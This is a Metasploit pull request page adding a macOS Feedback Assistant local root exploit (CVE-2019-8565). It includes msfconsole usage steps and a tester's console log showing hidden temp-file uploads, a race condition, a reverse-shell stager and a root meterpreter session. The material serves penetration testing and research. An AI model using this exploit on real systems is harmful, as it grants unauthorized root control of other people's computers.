Add CVE-2019-8565 OSX Feedback Assistant local root exploit #11818

Merged
merged 2 commits into from May 20, 2019

@timwr
Contributor

commented May 6, 2019

Similar to #11726, but quicker.
Thanks to @ChiChou

Verification

  • Start msfconsole
  • Get a (user) session on OSX < 10.14.4
  • Run the module:

        use exploit/osx/local/feedback_assistant_root
        set SESSION -1
        set LHOST <tab>
        set LPORT 4445
        exploit

  • Verify you get a new session as root
  • Document the thing and how it works
@jmartin-r7

Contributor

commented May 9, 2019

@msjenkins-r7 test this please.

@wchen-r7

Contributor

commented May 20, 2019

This exploit works for me over a Python meterpreter session:

msf5 exploit(osx/local/feedback_assistant_root) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.135.1:5555 
[*] Uploading file: '/tmp/.wdvrmfx'
[*] Uploading file: '/tmp/.xundvvt'
[*] Executing exploit '/tmp/.xundvvt'
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (808504 bytes) to 172.16.135.130
[*] Exploit result:
2019-05-20 10:16:11.516 .xundvvt[580:8272] [LightYear] canary: /usr/local/bin/netdiagnose
2019-05-20 10:16:11.516 .xundvvt[580:8272] [LightYear] dictionary: {
    "/var/log/../../../var/folders/bg/sp3s48cs1zn3yvtgjrn6ggs00000gn/T/BEB0AEB0-680C-481D-85A1-99936F345C60-580-0000010C2596EF15/bin/root.sh" = "/tmp/../../usr/local/bin/netdiagnose";
}
2019-05-20 10:16:11.516 .xundvvt[580:8272] [LightYear] Now race
2019-05-20 10:16:12.106 .xundvvt[580:8272] [LightYear] Stage 1 succeed
2019-05-20 10:16:12.291 .xundvvt[580:8277] [LightYear] It works!
[*] Meterpreter session 20 opened (172.16.135.1:5555 -> 172.16.135.130:49249) at 2019-05-20 12:16:27 -0500

meterpreter > 

Tested platform: OS X High Sierra (10.13.6)

I'll try to add some content for the module documentation before I land it.

@wchen-r7 wchen-r7 self-assigned this May 20, 2019

@wchen-r7 wchen-r7 merged commit 7968bd9 into rapid7:master May 20, 2019

2 of 3 checks passed

  • continuous-integration/travis-ci/pr: The Travis CI build failed
  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.

wchen-r7 added a commit that referenced this pull request May 20, 2019

@wchen-r7

Contributor

commented May 20, 2019

Release Notes

This adds an exploit for CVE-2019-8565, an OSX Feedback Assistant local root exploit.

msjenkins-r7 added a commit that referenced this pull request May 20, 2019
